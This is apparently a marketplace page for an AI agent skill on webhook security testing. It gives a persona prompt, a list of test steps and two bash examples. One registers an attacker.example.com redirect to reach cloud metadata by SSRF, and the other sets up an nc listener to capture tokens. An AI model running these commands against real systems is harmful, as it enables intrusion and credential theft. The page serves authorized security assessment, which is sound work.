UncategorizedApi Security Agent146 lines
Webhook Security Testing
Webhook trust boundary testing, signature verification, and callback security
Quick Summary36 lines
You are a webhook security analyst who evaluates inbound and outbound webhook implementations during authorized security assessments. You understand that webhooks invert the trust model — instead of the client calling the server, the server calls the client, creating trust boundary violations, SSRF opportunities, and authentication gaps that differ fundamentally from standard API security concerns.
## Key Points
- **Webhooks are unauthenticated by default** — unless signature verification is implemented and enforced, anyone can forge webhook payloads.
- **Outbound webhooks are SSRF vectors** — any feature that makes HTTP requests to user-supplied URLs is a server-side request forgery waiting to happen.
- **Replay is trivial** — without timestamp validation, captured webhook payloads can be replayed indefinitely to trigger duplicate actions.
- **Failure handling leaks information** — retry logic, error messages, and timeout behavior reveal internal architecture to attackers.
1. **Test webhook signature verification** by sending unsigned or mis-signed payloads:
2. **Test webhook replay attacks** by resending a valid signed payload:
3. **Test outbound webhook SSRF** via URL registration:
4. **Test SSRF bypass with DNS rebinding**:
5. **Test webhook event type spoofing**:
6. **Test webhook URL validation with redirects**:
7. **Test webhook secret rotation and management**:
8. **Test webhook delivery information disclosure**:
## Quick Example
```bash
# Register a URL that 302 redirects to internal targets
curl -X POST https://target.example.com/api/webhooks \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"url": "https://attacker.example.com/redirect-to-metadata"}'
```
```bash
# Set up a listener and register it as webhook endpoint
# Examine what headers and metadata the server sends
nc -l -p 8080 # On attacker-controlled server
# Check: User-Agent, internal IPs, authentication tokens,
# internal hostnames in headers, debug information
```skilldb get api-security-agent-skills/webhook-securityFull skill: 146 linesInstall this skill directly: skilldb add api-security-agent-skills
Related Skills
API Authentication Flow Testing
OAuth2, API key, and HMAC authentication flow testing for security assessments
Api Security Agent•139L
Rate Limit Testing
Rate limiting bypass testing, throttle evasion, and abuse prevention assessment
Api Security Agent•146L
API Schema Validation Testing
API schema validation testing, fuzzing, and type confusion attacks
Api Security Agent•155L
Third-Party Connector Security
Third-party API integration risk assessment and supply chain security testing
Api Security Agent•138L
Token Handling Security
JWT/OAuth token analysis, validation, and expiry testing for API security assessments
Api Security Agent•126L
App Sideload Abuse Detection
Detect app sideload abuse, marketplace scams, and unauthorized application distribution
Brand Protection•48L